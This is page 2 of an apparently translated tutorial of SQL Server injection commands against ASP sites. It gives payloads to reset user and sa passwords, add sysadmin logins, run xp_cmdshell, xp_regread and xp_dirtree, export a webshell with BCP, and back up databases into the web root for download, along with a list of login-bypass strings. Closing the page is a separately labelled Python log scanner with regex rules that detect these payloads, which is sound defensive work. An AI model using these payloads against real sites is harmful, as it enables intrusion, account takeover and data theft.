SoFunction
Updated on 2025-04-10

40 detailed commands for ASP injection page 2/2


9. Use update to change data in a table:
HTTP:///?p=YY;update  set pwd='a0b923820dcc509a' where username='www';-- 
This sets the www user's password hash to the 16-character (so-called 16-bit) MD5 value a0b923820dcc509a, i.e. the password becomes 1.
The 32-character MD5 value is:  , and the password is 

10. Use the ability to export table contents into files
SQL Server has a BCP command that can export the contents of a table into a text file at a specified location. Using this, we can first create a temporary table, write the lines of an ASP * into it row by row, and then export it with BCP to form an ASP file.
The command line format is:
bcp "select * from temp" queryout c:\inetpub\wwwroot\ -c -S localhost -U sa -P upload(the -S parameter is the server that runs the query, -U is the user name, -P is the password; this finally uploads a *).

11. Method to create a table, insert data into it and read it back
- Create the table:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))-- 
- Insert data into the table (the first statement stores a table name, the second the web root read from the registry):
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 @result=name from  where xtype='U' and status>0 insert into cyfd (gyfd) values(@result);-- 
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec .xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);-- 
- Read data from the table (the comparison forces a conversion error whose message contains the stored value):
' and 1=(select count(*) from cyfd where gyfd >1)-- 

- Delete the temporary table:
';drop table cyfd;-- 

12. Change the sa password directly through SQL statements:
- update  set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01 changes the sa password to 1111111. The remedy is to delete sa; for how to do that, see my "Completely Delete the Backdoor of Sa".

- View all database user names on this machine:
select * from  
select name,sid,password ,dbid from  

- Change the sa password: after connecting with a SQL comprehensive utilization tool, execute:
exec sp_password NULL,'new password','sa'

13. Query all table names and table structures in the dvbbs library:
- select * from  where xtype='U' and status>0 
- select * from  where id=1426104121 

14. Manually back up the current database:
Complete backup:
;declare @a sysname,@s nvarchar(4000)  
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH FORMAT-- 
Differential backup:
;declare @a sysname,@s nvarchar(4000)  
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 

15. Add and delete a user with SA permissions:
exec .sp_addlogin test,ptlove 
exec .sp_addsrvrolemember test,sysadmin 

 /c isql -E /U alma /P /i K:\  

16. select * from  where xtype='U' and status>0  
lists the names of all user-created tables in the library ChouYFD.
select name,id from  where xtype='U' and status>0 

17. 
- /zgrdw/common/image_view.jsp?sqlstr=select * from  (where id=1234) 
Lists the field names of all tables in the rdweb library.
- select * from  where id=5575058  
Lists all field names of the table with id=5575058 in the dvbbs library.

18. Delete record command: delete from Dv_topic where boardid=5 and topicid=7978

19. Summary of strings used to bypass login verification and reach the backend:
1) ' or''=' 
2) ' or 1=1-- 
3) ' or 'a'='a-- 
4) 'or'='or' 
5) " or 1=1--  
6)or 1=1-- 
7) or 'a='a 
8)" or "a"="a  
9) ') or ('a'='a 
10) ") or ("a"="a 
11) ) or (1=1 
12) 'or''=' 
13) Popularity%'and 1=1 and '%'='

20. Summary of methods for finding the website path:
1) Check the web site installation directory:
- cscript c:\inetpub\adminscripts\ enum w3svc/2/root >c:\ (try changing 2 to 1, 3, 4, 5)
type c:\ 
del c:\ 
Under NBSI the results are displayed directly, so there is no need to export to a file.

2) Find the name of a picture on the website, then write it into a batch file:
d: 
dir  /s >c:\ 
e: 
dir  /s >>c:\ 
f: 
dir  /s >>c:\ 

After running it, type c:\
and analyse the output to work out the website path.

3) If the SQL server and the web server are the same machine and you can execute commands, redirect the command output into
%windir%\help\iishelp\common\ or 
(back up those two files before writing to them), for example:
dir c:\ >%windir%\help\iishelp\common\ 
Then request the file in a browser: http://target ip/

4) On a Windows 2000 system, xp_regread can read HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots to obtain the web path.
On Windows 2003: no method found for reading it with xp_regread.
For example:
(1) Create a new table cyfd (with field gyfd): /?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2) Write the web path into it: /?id=4844;DECLARE @result varchar(255) exec .xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) Force a type mismatch so the error message displays the value: /?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider 
Description: A syntax error occurred when converting the varchar value 'Y:\Web\Yantai Talent Hotline Backend Management System,,201 ' to a column with data type int.
TargetSite: Boolean Read() The path is exposed.
(4) Finally delete the table: /?id=4844;drop table cyfd;--

5) Use the regedit command to export the registry and save the result to %windir%\help\iishelp\common\ or page.
Regedit command description:
Regedit /L:system /R:user /E  Regpath 
Parameter meanings:
/L:system specifies the path where the  file is located.
/R:user specifies the path where the  file is located.
/E tells the registry editor to export the registry; it is followed by a space and then the file name to export to.
Regpath specifies which registry branch to export. If it is omitted, the entire registry is exported.

The "/L:system" and "/R:user" parameters are optional. If they are not given, the registry editor assumes it is working on the "" and "" files in the WINDOWS directory. If you have booted from a floppy into DOS, you must use "/L" and "/R" to give the exact paths of the "" and "" files, otherwise the registry editor cannot find them. For example, after booting into DOS from a startup disk, the command to back up the registry is "Regedit /L:C:\windows\ /R:C:\windows\ /e ". It backs up the entire registry to the WINDOWS directory under the file name "". The command "regedit /E D:\" backs up the entire registry to the root of drive D (with "/L" and "/R" omitted), under the file name "".

regedit /s c:\ (import the file c:\ into the registry)
regedit /e c:\ (back up the entire registry to c:\)
On Windows 2000: C:\>regedit /e %windir%\help\iishelp\common\"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Then open http://target IP/
On Windows 2003: not found; anyone who works it out, please share so we can discuss it.

6) On a virtual host, the files under %SystemRoot%\system32\inetsrv\MetaBack\ are the IIS backup files, and web users are allowed to access them. If the IIS backup is there, download it with a webshell and open it in Notepad to get the corresponding domain names and absolute web paths.

7) SQL injection: creating a virtual directory when the absolute web path cannot be found with dbo permissions:
Often we meet SQL injection where directories can be listed and commands run, but the web directory is hard to find, so getting a webshell is hard. This trick works well:
- Create a virtual directory win pointing to c:\winnt\system32: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ -c localhost -w "l" -v "win","c:\winnt\system32"'
- Give the win directory permission to execute asp scripts: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ set w3svc/1/root/win/Accessexecute "true" -s:'
- Delete the virtual directory win: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ delete w3svc/1/root/win/'
- Test: http://127.0.0.1/win/

8) Use SQL statements to find the web directory. In my experience the most likely location of the web root is drive D, then E, then C. First create a temporary table to hold the directory tree produced by master..xp_dirtree (which works with public permissions):
;create table temp(dir nvarchar(255),depth varchar(255));--
The dir field holds the directory name and the depth field its depth. Then run xp_dirtree to get the directory tree of drive D:
;insert temp(dir,depth) exec .xp_dirtree 'd:';--  

Before going further, first check how many folders there are on drive D, to get a general picture of it:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume'))>=N (N=0, 1, 2, 3...)

Next, find a few first-level subdirectories of the target website, such as user and photo, and use a filtering query to determine whether the web root is on this drive:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)  

Look at the result. If it is true, the web root may be on this drive. For further confirmation, test a few more subdirectories:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)  

...  

If all tests return true, the web root is very likely on this drive.

Assuming the web root is on this drive, use the following statement to obtain the depth of a first-level subdirectory:
and (select depth from temp where dir='user')>=N (N=1, 2, 3...)

If the depth obtained is 3, the user directory is a level-3 directory of drive D, so the web root is a level-2 directory of drive D.

We now know the drive letter and depth of the root directory. To find its exact location we search level by level, starting from the root of drive D. There is no need to know the name of every directory, which would take too much time.

Next, create another temporary table to hold all directories under one first-level subdirectory of drive D:

;create table temp1(dir nvarchar(255),depth varchar(255));--  

Then save all directories under the first subdirectory of drive D into temp1:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp1 exec .xp_dirtree @dirname
To save the directories under the second subdirectory of drive D into temp1 instead, change the second top 1 to top 2.

Now all directories under that first-level subdirectory of drive D are in temp1, and we use the same method to determine whether the root directory is in this subdirectory:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)  
If it returns true, the root directory may be in this subdirectory; remember to test a few more examples. If all return false, the web root is not in this directory, and we use the same method to list the directories under the 2nd, 3rd, ... subdirectories of drive D and check whether the web root is under them. Be careful to delete the contents of temp1 before running xp_dirtree again.

Now suppose the web root is in a first-level subdirectory of drive D named website (how to get that name needs no explanation). Since we learned earlier that the depth of the web root is 2, we need to find which directory under website is the real web root.

Now, in the same way, create a third temporary table:
;create table temp2(dir nvarchar(255),depth varchar(255));--  

Then save all directories under the first subdirectory of D:\website into temp2:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp2 exec .xp_dirtree @dirname
To save the directories under the second subdirectory of D:\website into temp2 instead, change the second top 1 to top 2.

Now, use the same method to determine whether this directory is the root directory:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)  
If it returns true, test a few more examples as described above to confirm the judgement.
If several examples return true, the directory is the web root.


The method above is usually enough to obtain the web root. Now let's assume the web root is D:\website\www.
Then we can back up the current database into this directory and download it. Before backing up, clear temp, temp1 and temp2 and save the directory trees of drives C, D and E into them respectively.

After downloading the database, remember to drop the three temporary tables. The downloaded database then contains the full directory listings, including the backend management directory and more.
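As an added, defender-side example that is not part of the original page: the commands collected on this page (stacked statements after `;`, calls to xp_regread, xp_dirtree, xp_cmdshell, sp_addlogin and sp_addsrvrolemember, BACKUP DATABASE ... TO DISK, the `and 1=(select ...)` conversion-error probe, and the login-bypass strings of section 19) all leave characteristic traces in the web server's request log. The script below applies simple indicator rules to constructed IIS-style log lines that mirror those commands. The log lines, the rule names and the W3C field layout are assumptions made for this example, not captured traffic or an existing tool.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in the shape of IIS W3C extended logging
# (date time cs-method cs-uri-stem cs-uri-query sc-status). The queries mirror
# the commands on this page; none of these lines are real captured traffic.
SAMPLE_LOG = """\
2025-04-10 10:00:01 GET /list.asp id=4844 200
2025-04-10 10:00:02 GET /list.asp id=4844;create%20table%20[dbo].[cyfd]([gyfd][char](255))-- 200
2025-04-10 10:00:03 GET /list.asp id=4844;DECLARE%20@result%20varchar(255)%20exec%20xp_regread%20'HKEY_LOCAL_MACHINE','SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual%20Roots','/',@result%20output%20insert%20into%20cyfd%20(gyfd)%20values(@result);-- 200
2025-04-10 10:00:04 GET /list.asp id=4844%20and%201=(select%20count(*)%20from%20cyfd%20where%20gyfd%20>1) 500
2025-04-10 10:00:05 GET /login.asp user=%27%20or%201%3D1--&pwd=x 302
2025-04-10 10:00:06 GET /show.asp id=12;insert%20temp(dir,depth)%20exec%20xp_dirtree%20'd:';-- 200
2025-04-10 10:00:07 GET /show.asp id=12;backup%20database%20dvbbs%20to%20disk='c:/db1'%20WITH%20FORMAT-- 200
2025-04-10 10:00:08 GET /search.asp keyword=ASP%20injection 200
"""

# Indicator rules, applied to the URL-decoded query string. The names are
# labels chosen for this example; tune the patterns to the application before
# relying on them, since a few (the comment terminator especially) are weak on
# their own.
INDICATORS = [
    ("stacked-statement",
     re.compile(r";\s*(create|drop|insert|declare|exec|backup|update|delete)\b", re.I)),
    ("extended-procedure",
     re.compile(r"\b(xp_cmdshell|xp_regread|xp_dirtree|sp_addlogin|sp_addsrvrolemember|sp_password)\b", re.I)),
    ("backup-to-file",
     re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I)),
    ("error-based-probe",
     re.compile(r"\band\s+1\s*=\s*\(\s*select\b", re.I)),
    ("login-bypass",
     re.compile(r"""(['"]\s*or\s*['"\d]|\bor\s+1\s*=\s*1\b)""", re.I)),
    ("comment-terminator",
     re.compile(r"--\s*$")),
]


def parse_line(line: str):
    """Split one W3C-style line into its fields; returns None for short lines."""
    parts = line.split()
    if len(parts) < 6:
        return None
    date, time, method, stem, query, status = parts[:6]
    return {"time": f"{date} {time}", "method": method, "stem": stem,
            "query": unquote_plus(query), "status": status}


def classify(query: str) -> list:
    """Return the names of all indicator rules that match a decoded query string."""
    return [name for name, rx in INDICATORS if rx.search(query)]


def scan_log(text: str) -> list:
    """Return one record per suspicious request: timestamp, URI stem and indicators."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        found = classify(rec["query"])
        if found:
            hits.append({"time": rec["time"], "stem": rec["stem"], "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["stem"], ", ".join(hit["indicators"]))
```

Six of the eight constructed requests are flagged; the plain `id=4844` and the search request are not. In practice the same rules belong in the SQL Server side as well (auditing of xp_cmdshell, xp_regread and xp_dirtree execution), since the application log only sees what came in through the web tier.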
